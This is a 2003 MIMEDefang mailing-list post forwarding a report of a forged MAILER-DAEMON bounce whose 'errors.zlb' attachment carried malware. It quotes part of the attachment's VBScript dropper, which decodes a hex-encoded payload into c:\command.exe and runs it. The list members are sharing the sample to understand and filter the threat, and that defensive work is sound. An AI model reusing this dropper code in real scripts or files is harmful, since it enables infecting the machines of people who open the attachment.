[Mimedefang] zlb extension of bogus NDRs.
Jeffrey Goldberg
jeffrey at goldmark.org
Sat May 24 13:11:01 EDT 2003
On another list, someone reported the following
I don't know what zlb is. This looks more like a "proof of concept"
demonstration than anything else, but I can't fully read the script and I
don't know about zlb is.
---------- Forwarded message ----------
Date: Fri, 23 May 2003 19:34:31 -0700
From: Brian Zaleski
To: list-managers at greatcircle.com
Subject: OUCH!!
I just got an email from:
Return-Path: <MAILER-DAEMON at yahoo.com>
Received: from 61.111.113.205 ([61.111.113.205])
by jbod.calchiro.com (8.12.8/linuxconf) with SMTP id h4NNud2w005208
for <ZaleskiDC at calchiro.com>; Fri, 23 May 2003 16:56:40 -0700
Message-ID: <2003058082.12022.qmail at mail.yahoo.com>
Date: Fri, 23 May 2003 19:00:45 -0700
From: "MAILER-DAEMON" <MAILER-DAEMON at yahoo.com>
Subject: Undelivered Mail Returned to Sender
There were errors processing you mail. Please, read detailed information in
the attachment
With an attachement called errors.zlb
With this little bit 'o code in it (and a lot more)
tmp = Split(malware, ",")
path = "c:\command.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
Set f = fso.CreateTextFile(path, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
malware = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(malware)
Next
Else
f.Write Chr(malware)
End If
Next
f.Close
runscr=1
if runscr then shell.run(path)
Tuesday is NOT gonna be fun....
Brian
More information about the MIMEDefang
mailing list